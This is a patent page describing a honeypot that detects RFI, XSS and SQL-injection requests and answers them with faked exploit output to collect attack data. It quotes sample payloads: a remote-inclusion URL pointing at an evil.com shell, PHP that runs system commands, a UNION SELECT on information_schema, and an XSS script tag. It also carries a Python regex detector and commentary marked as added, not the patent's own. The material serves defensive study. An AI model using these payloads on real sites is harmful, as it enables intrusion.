CN109508548B - Threat behavior collecting system and method based on simulator technology - Google Patents

Threat behavior collecting system and method based on simulator technology

Info

Publication number: CN109508548B
Authority: CN (China)
Prior art keywords: threat, request, module, vulnerability, http
Legal status: Active
Application number: CN201811375932.9A
Other languages: Chinese (zh)
Other versions: CN109508548A (en)
Inventor: 江佳峻
Current Assignee: Sichuan Changhong Electric Co Ltd
Original Assignee: Sichuan Changhong Electric Co Ltd
Priority date: 2018-11-19
Filing date: 2018-11-19
Publication date: 2019-03-22 (CN109508548A); 2022-06-03 (CN109508548B)
Application filed by Sichuan Changhong Electric Co Ltd; priority to CN201811375932.9A; publication of CN109508548A; application granted; publication of CN109508548B.

Classifications

    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/57 Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
    • G06F21/577 Assessing vulnerabilities and evaluating computer system security
    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F2221/00 Indexing scheme relating to security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F2221/03 Indexing scheme relating to G06F21/50, monitoring users, programs or devices to maintain the integrity of platforms
    • G06F2221/034 Test or assess a computer or a system

Abstract

The invention discloses a threat behavior collecting system based on simulator technology. It comprises a Web application service module, a threat identification module, a vulnerability simulation module and a storage module; the Web application service module provides the entry point for threat behavior collection and is connected with the threat identification module and the storage module, and the threat identification module is connected with the vulnerability simulation module. The system uses simulator technology to collect threat behaviors: it identifies threat data in network traffic, responds to each identified threat type with the simulator, and simulates the corresponding vulnerability, so that threat data is collected without rebuilding an existing application system. It is a lightweight threat behavior collection technique that supports both threat behavior attack detection and analysis of the collected threat behavior data.

Description

Threat behavior collecting system and method based on simulator technology
Technical Field
The invention relates to the technical field of web security detection, in particular to a threat behavior collecting system and method based on simulator technology.
Background
Among network attacks, attacks on web applications account for over 60%. Web applications are exposed to the public network, and many of them have vulnerabilities that can lead to application data leakage and application service failure, causing losses to the owner of the web application. Threat behavior collection technology is therefore necessary in order to research and analyse attack behavior and to respond better to attack threats.
Disclosure of Invention
The invention aims to overcome the defects in the background art and provides a threat behavior collecting system and method based on simulator technology, with which threat behavior attack detection and threat behavior data analysis can be performed.
In order to achieve the technical effects, the invention adopts the following technical scheme:
a threat behavior collecting system based on simulator technology comprises a Web application service module, a threat identification module, a vulnerability simulation module and a storage module; the Web application service module is connected with the threat identification module and the storage module, and the threat identification module is connected with the vulnerability simulation module;
the Web application service module implements the web application service and receives http requests from the outside, the http requests comprising GET requests and POST requests; the Web application service module sends each received POST request to the storage module for storage and each received GET request to the threat identification module;
the threat identification module performs threat identification on the parameters of the received GET request and hands the request to the vulnerability simulation module when an RFI attack, an XSS attack or an SQL attack is identified;
the vulnerability simulation module identifies the attack content of the payload in the parameters of the received GET request, simulates the corresponding vulnerability execution result using simulation technology, and returns an http response carrying that result to the requester. On receiving such a response the attacker believes that the web service has the vulnerability (for example an SQL or XSS vulnerability) and sends further http attack payloads to carry out the next attack, so that the threat behavior collection system based on simulator technology obtains more valuable attack data.
The invention also discloses a threat behavior collecting method based on simulator technology, which comprises the following steps:
A. deploying the threat behavior collecting system based on simulator technology on a public network;
B. the Web application service module of the system receives an external http request and classifies it;
C. if the received http request is a POST request, the Web application service module passes it to the storage module for storage;
if the received http request is a GET request, the Web application service module passes it to the threat identification module, and step D is entered;
D. the threat identification module performs threat identification on the parameters of the received GET request; if the request is identified as an RFI threat request, an XSS threat request or an SQL threat request, it is passed to the vulnerability simulation module;
E. the vulnerability simulation module identifies the attack content of the payload in the received GET request parameters, simulates the corresponding vulnerability execution result using simulator technology, returns an http response carrying that result to the requester, and stores the threat behavior data in the storage module;
F. the threat behavior data is collected from the storage module.
Further, step E specifically comprises the following steps:
E1. the vulnerability simulation module parses the payload in the received GET request parameters and, if the GET request is an RFI threat request, fetches the remote file;
E2. the content of the fetched remote file, or the payload in the parameters of an SQL or XSS threat request, is read and base64-decoded to obtain the decoded result;
E3. the vulnerability simulation module performs rule matching on the decoded result line by line and determines the attack type of the request;
E4. the corresponding attack execution result is simulated using simulator technology, and an http response carrying that result is returned to the requester;
E5. the attack payload data is saved to the storage module.
Further, in step D, if the identified request is another type of threat request, that is, one which is not an RFI threat request, an XSS threat request or an SQL threat request, a regular response is returned to the requester.
Further, if the http request received in step C is a POST request, the Web application service module sends it to the storage module for storage and then returns a regular response to the requester.
Compared with the prior art, the invention has the following beneficial effects:
the threat behavior collecting system and method based on simulator technology use the simulator to collect threat behaviors: threat data in the network is identified, the simulator responds to each identified threat type and simulates the corresponding vulnerability, and threat data is thereby collected without modifying an existing application system. The system is a lightweight threat behavior collection technique, supports threat behavior attack detection and threat behavior data analysis, and has a wide range of application.
Drawings
FIG. 1 is a schematic diagram of a threat behavior gathering system of the present invention based on simulator technology.
FIG. 2 is a flow chart diagram of the threat behavior gathering method based on simulator technology.
Fig. 3 is a schematic flow chart illustrating how a vulnerability simulation module is used to simulate a vulnerability according to an embodiment of the present invention.
Detailed Description
The invention will be further elucidated and described with reference to the embodiments of the invention described hereinafter.
Example one
As shown in FIG. 1, a threat behavior collecting system based on simulator technology includes a Web application service module, a threat identification module, a vulnerability simulation module and a storage module; the Web application service module is connected with the threat identification module and the storage module, and the threat identification module is connected with the vulnerability simulation module.
Specifically, the Web application service module implements the web application service and receives http requests from the outside, supporting GET and POST requests. It passes each received POST request directly to the storage module for storage and each received GET request to the threat identification module.
The threat identification module performs threat identification on the parameters of the GET request and, if an RFI, XSS or SQL attack is present, hands the request to the vulnerability simulation module.
The vulnerability simulation module identifies the attack content of the payload in the request parameters, simulates the corresponding vulnerability execution result using simulation technology, and returns an http response carrying that result to the requester. The attacker then believes that the web service has the vulnerability (for example an SQL or XSS vulnerability) and sends a further http attack payload to carry out the next attack, so that the threat behavior collection system obtains more valuable attack data.
The storage module stores the corresponding request data and threat behavior data so that the threat behavior data can be collected later.
In operation, the Web application service module receives an external HTTP request. For an HTTP POST request, the raw data of the request is sent directly to the storage module for storage and a normal response is returned to the requester.
An HTTP GET request is sent to the threat identification module. If it is judged to be an RFI, SQL or XSS threat request, it is passed to the vulnerability simulation module, which uses the simulator to simulate the targeted vulnerability and respond. If it does not belong to the RFI, SQL or XSS threat requests, it is judged to be another threat request, and for these a conventional response is returned to the requester, i.e. a normal page, similar to the response to a POST request.
When the vulnerability simulation module simulates the vulnerability request and responds, it first parses the http parameters to obtain their values, then performs rule matching to decide whether the request is an attack and of which type, then simulates the corresponding attack execution result using simulator technology, and returns a response containing the code execution result to the requester. In other words, the simulated vulnerability appears to be exploited and the attacker's code appears to execute, feeding system information back to the attacker.
Finally, the threat data, namely the content of the attack payload, is stored in the storage module so that threat behavior data can be collected later.
Example two
As shown in FIG. 2, a threat behavior collecting method based on simulator technology specifically includes the following steps:
Step one: deploy the threat behavior collecting system based on simulator technology on a public network.
Step two: the Web application service module receives an external HTTP request. For an HTTP POST request, the raw data of the request is passed directly to the storage module for storage and a normal response is returned to the requester, for example:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; Charset=GB2312
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Wed, 14 Nov 2018 10:39:00 GMT
Content-Length: 67

<html>
<body>
<p>this is a normal response</p>
</body>
</html>
An HTTP GET request is sent to the threat identification module for threat identification and classification. Taking Remote File Inclusion (RFI) as an example: the server response the attacker expects is the result of executing the included attack code, and the attack request sent by the attacker is as follows:
GET http://example.com/vulnerable.php?color=http://evil.com/shell.php
This http request is a GET request, and the value of the request parameter color is the URL of a remote file (shell.php).
Step three: the threat identification module receives the request and performs threat identification. If the request is judged to be an RFI, SQL or XSS threat request, it is passed to the vulnerability simulation module, which uses the simulator to simulate the vulnerability request and respond. If it does not belong to the RFI, SQL or XSS threat requests, it is judged to be another threat request, and a conventional response, i.e. a normal page, is returned to the requester, similar to the response to a POST request.
The threat identification module can simply use rules such as:
if '=http://' in request:
    handle_rfi_request()
That is, if http:// appears in a request parameter value, the request can be simply judged to be an RFI attack. A substring rule of this kind is coarse: it matches neither an https:// include nor a percent-encoded value such as http%3A%2F%2F, so a deployed identification module should decode parameter values before matching.
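The threat identification module of step three together with the GET/POST dispatch of step two, as an added example that is not the patent's own code. It generalizes the single substring rule shown above: each query parameter is percent-decoded (repeatedly, to catch double encoding) and matched against separate RFI, XSS and SQL patterns, and benign values such as a colour code are left alone. The regular expressions, the parameter names and the sample requests are constructed for illustration.

```python
"""Threat identification for GET requests (RFI / XSS / SQL / other) plus the
GET/POST dispatch of the Web application service module.

Added example, not the patent's own code. The patterns, parameter names
and sample requests are constructed for illustration; the only rule the
page itself shows is the substring check "'=http://' in request".
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Remote file inclusion: a parameter value that is itself a URL or a PHP
# stream wrapper (php://, data://) that an include() target could resolve.
RFI_RE = re.compile(r'^\s*(?:https?|ftp|php|data)://', re.IGNORECASE)

# Reflected XSS: a tag that can carry script, an event handler, or a
# javascript: URL.
XSS_RE = re.compile(
    r'<\s*(?:script|img|svg|iframe|body|object|embed)\b'
    r'|\bon(?:error|load|mouseover|focus)\s*='
    r'|javascript\s*:', re.IGNORECASE)

# SQL injection: UNION SELECT, tautologies such as ' or '1'='1, time-based
# functions, information_schema, or a quote followed by a comment marker.
SQL_RE = re.compile(
    r"\bunion\b[\s\S]+?\bselect\b"
    r"|(?:'|\b)\s*(?:or|and)\s+[\w']+\s*=\s*[\w']+"
    r"|\b(?:sleep|benchmark)\s*\("
    r"|\binformation_schema\b"
    r"|'\s*(?:--|#|/\*)", re.IGNORECASE)


def decode_value(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding; attackers double-encode to slip past
    rules that decode once. Stops as soon as a round changes nothing."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value: str):
    """Return 'RFI', 'XSS', 'SQL' or None for one parameter value."""
    v = decode_value(value)
    if RFI_RE.search(v):
        return 'RFI'
    if XSS_RE.search(v):
        return 'XSS'
    if SQL_RE.search(v):
        return 'SQL'
    return None


def classify_request(request_target: str):
    """Classify a GET request target (path or absolute URL).

    Returns (threat_type, parameter_name, decoded_value); threat_type is
    'RFI', 'XSS', 'SQL' or 'other', and 'other' requests get the normal page.
    """
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        kind = classify_value(value)
        if kind:
            return kind, name, decode_value(value)
    return 'other', None, None


def route(method: str, request_target: str) -> str:
    """Dispatch of the Web application service module: POST requests are
    stored raw and answered with the normal page; GET requests go through
    threat identification and only RFI/XSS/SQL reach the simulator."""
    if method.upper() == 'POST':
        return 'store+normal'
    kind, _, _ = classify_request(request_target)
    return 'simulate' if kind != 'other' else 'normal'


# Constructed sample traffic (not captured data).
SAMPLE_REQUESTS = [
    ('GET', 'http://example.com/vulnerable.php?color=http://evil.com/shell.php'),
    ('GET', '/page.php?file=%2568ttp%3A%2F%2Fevil.com%2Fx.php'),   # double-encoded RFI
    ('GET', '/search.php?q=%3Cscript%3Ealert(%27xss%27)%3C/script%3E'),
    ('GET', '/item.php?id=1%20union%20select%201,2,table_name%20from%20information_schema.tables'),
    ('GET', '/index.php?page=home&color=%23fff'),                  # benign
    ('POST', '/comment.php'),
]

if __name__ == '__main__':
    for method, target in SAMPLE_REQUESTS:
        print(route(method, target), classify_request(target) if method == 'GET' else '-')
```

The ordering of the checks matters: RFI is tested first because a remote URL can also contain quotes or keywords that would trip the SQL pattern, and a value is only reported under the first class it matches.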
Step four: attack recognition and response; the specific flow is shown in FIG. 3.
The vulnerability simulation module parses the http parameters of the received request and obtains the value of the parameter color.
For the attack request GET http://example.com/vulnerable.php?color=http://evil.com/shell.php above, the value of color is http://evil.com/shell.php.
When the vulnerability simulation module finds a URL in the parameter value, it attempts to send an http request to http://evil.com/shell.php and fetch the file shell.php. After fetching the file it reads its content and base64-decodes it; in this embodiment the decoded result is:
<?php
$un=@php_uname();
$up=system("uptime");
echo "uname-a:$un<br>";
echo "uptime:$up<br>";
?>
The vulnerability simulation module then performs line-by-line rule matching in the simulator. When @php_uname() is matched, the result stored for that rule in the system is looked up, for example:
Linux localhost.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
Specifically, the rules stored in the system in this embodiment take the form of a table (shown as an image in the original document) mapping each matched PHP call to its stored result.
The emulator program looks the table up by key and extracts the result when php_uname() is matched; the rules can be stored in a system file or in a database.
Then the vulnerability response is performed:
when the echo is matched, $un is replaced by the result above, and the http response is returned to the attacker. The response in this embodiment is as follows:
HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Wed, 14 Nov 2018 09:12:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10
Connection: keep-alive

uname-a: Linux my.leetserver.com 2.6.18-6-k7 GNU/Linux<br>
uptime: 19:42:43 up 3 days, 22:39, 1 user, load average: 0.9, 0.2, 0.1<br>
The header values above are illustrative. In a deployed simulator the Content-Length must equal the actual body length and the Server banner must fit the emulated stack, since a response whose headers disagree with its body reveals the simulation to the attacker.
Finally, the threat behavior data is stored. The threat data is the payload of the attack: for an RFI threat request, the PHP code in the remote file (shell.php) is stored; for an SQL threat request, the SQL injection statement is stored, for example:
1 union select 1,2,table_name from information_schema.tables where table_schema=schema_name
For an XSS threat request, the stored content is the XSS attack payload, for example:
<script>alert('xss')</script>
Step five: collect the threat behavior data gathered by the public-network deployment.
It will be understood that the above embodiments are merely exemplary embodiments taken to illustrate the principles of the present invention, which is not limited thereto. It will be apparent to those skilled in the art that various modifications and improvements can be made without departing from the spirit and substance of the invention, and these modifications and improvements are also considered to be within the scope of the invention.

Claims (3)

1. A threat behavior collecting method based on simulator technology is characterized by comprising the following steps:
deploying a threat behavior collecting system based on a simulator technology in a public network; the system comprises a Web application service module, a threat identification module, a vulnerability simulation module and a storage module;
a Web application service module of the threat behavior collection system based on the simulator technology receives an external http request and classifies the received http request;
if the received http request is a POST request, the Web application service module transmits the request to a storage module for storage;
if the received http request is a GET request, the Web application service module delivers the request to the threat identification module, and the step D is entered;
the threat identification module carries out threat identification on the received GET request parameters, and if the GET request parameters are identified to be an RFI threat request, an XSS threat request or an SQL threat request, the received GET request is delivered to the vulnerability simulation module;
the vulnerability simulation module identifies the attack content of payload in the received GET request parameters, simulates a corresponding vulnerability execution result by using a simulator technology, then returns an http response with the vulnerability execution result to the requesting party and stores the threat behavior data in the storage module;
E1. the vulnerability simulation module analyzes payload in the received GET request parameters, and if the GET request is an RFI threat request, a remote file is obtained;
E2. reading the content of the obtained remote file or payload in the parameters of the SQL threat request or the XSS threat request, and decoding the content by base64 to obtain a decoding result;
E3. the vulnerability simulation module carries out rule matching on the decoding result line by line and matches the attack type of the request;
E4. simulating a corresponding attack execution result by using a simulator technology, and then returning an http response with the attack execution result to the requester;
E5. storing the data of the attacked payload to a storage module;
and carrying out threat behavior data collection in the storage module.
2. The method for collecting threat behaviors based on simulator technology according to claim 1, wherein in step D, if the identified type of the threat request is another threat request, a regular response is made to the requester, wherein the other threat request is a threat request other than an RFI threat request, an XSS threat request or an SQL threat request.
3. The method for collecting threat behaviors based on simulator technology of claim 1, wherein if the http request received in step C is a POST request, the Web application service module will send the request to the storage module for storage and then will make a regular response to the requester.

Publications (2)

Publication Number Publication Date
CN109508548A CN109508548A (en) 2019-03-22
CN109508548B true CN109508548B (en) 2022-06-03

Families Citing this family (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN114143042A (en) * 2021-11-09 2022-03-04 奇安信科技集团股份有限公司 (Qi An Xin Technology Group Co., Ltd.) Vulnerability simulation method and device, computer equipment and storage medium

Citations (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
WO2014041561A2 (en) * 2012-08-31 2014-03-20 Iappsecure Solutions Pvt. Ltd. A system for analyzing applications accurately for finding security and quality issues
CN104426850A (en) * 2013-08-23 2015-03-18 南京理工大学常熟研究院有限公司 (Nanjing University of Science and Technology Changshu Research Institute Co., Ltd.) Vulnerability detection method based on plug-ins
CN104657659A (en) * 2013-11-20 2015-05-27 腾讯科技(深圳)有限公司 (Tencent Technology (Shenzhen) Co., Ltd.) Stored cross-site scripting vulnerability detection method, device and system
CN105359157A (en) * 2013-07-09 2016-02-24 国际商业机器公司 (International Business Machines Corp.) A network security system
CN106951242A (en) * 2017-03-10 2017-07-14 北京白帽汇科技有限公司 (Beijing Baimaohui Technology Co., Ltd.) Generation method, device and computing device for vulnerability verification programs
CN108683685A (en) * 2018-06-19 2018-10-19 三江学院 (Sanjiang University) Cloud security CDN system and monitoring method for XSS attacks

Family Cites Families (12)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US8566943B2 (en) * 2009-10-01 2013-10-22 Kaspersky Lab, Zao Asynchronous processing of events for malware detection
US8856935B2 (en) * 2012-02-07 2014-10-07 International Business Machines Corporation Automatic synthesis of unit tests for security testing
CN104063309A (en) * 2013-03-22 2014-09-24 南京理工大学常熟研究院有限公司 (Nanjing University of Science and Technology Changshu Research Institute Co., Ltd.) Web application vulnerability detection method based on simulated attacks
GB2519159A (en) * 2013-10-14 2015-04-15 Ibm Security testing of web applications with specialised payloads
CN103647678A (en) * 2013-11-08 2014-03-19 北京奇虎科技有限公司 (Beijing Qihoo Technology Co., Ltd.) Method and device for online verification of website vulnerabilities
WO2015142697A1 (en) * 2014-03-15 2015-09-24 Belva Kenneth F Methods for determining cross-site scripting and related vulnerabilities in applications
US20160028605A1 (en) * 2014-05-30 2016-01-28 Reylabs Inc. Systems and methods involving mobile linear asset efficiency, exploration, monitoring and/or display aspects
CN104537307A (en) * 2014-12-23 2015-04-22 北京奇虎科技有限公司 (Beijing Qihoo Technology Co., Ltd.) Method and system for detecting website vulnerabilities
CN104732144B (en) * 2015-04-01 2017-06-23 河海大学 (Hohai University) Remote code injection vulnerability detection method based on a pseudo-protocol
CN105678170B (en) * 2016-01-05 2018-05-29 广东工业大学 (Guangdong University of Technology) Method for dynamically detecting XSS vulnerabilities
CN108667770B (en) * 2017-03-29 2020-12-18 腾讯科技(深圳)有限公司 (Tencent Technology (Shenzhen) Co., Ltd.) Website vulnerability testing method, server and system
CN107832617B (en) * 2017-09-15 2021-03-30 北京知道未来信息技术有限公司 (Beijing Knownsec Information Technology Co., Ltd.) Black-box detection method and device for PHP code execution vulnerabilities

Non-Patent Citations (4)

* Cited by examiner, † Cited by third party
Title
CSSXC: Context-Sensitive Sanitization Framework for Web Applications against XSS Vulnerabilities in Cloud Environments; Shashank Gupta; International Conference on Computational Modeling and Security (CMS 2016); 2016-05-21; pp. 198-205 *
Web应用漏洞扫描系统 (Web application vulnerability scanning system); 王扬品 et al.; 计算机系统应用 (Computer Systems & Applications); 2015-12-15 (No. 12); full text *
基于HTML5 WebWorks组件的DDoS攻击方式和检测 (DDoS attack methods and their detection based on the HTML5 WebWorks component); 刘麒; 计算机应用与软件 (Computer Applications and Software); 2016-12-31; Vol. 33, No. 12; pp. 296-300 *
基于渗透测试的跨站脚本漏洞检测方法研究 (Research on cross-site scripting vulnerability detection methods based on penetration testing); 王强 et al.; 计算机技术与发展 (Computer Technology and Development); 2013-03-10 (No. 03); full text *

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant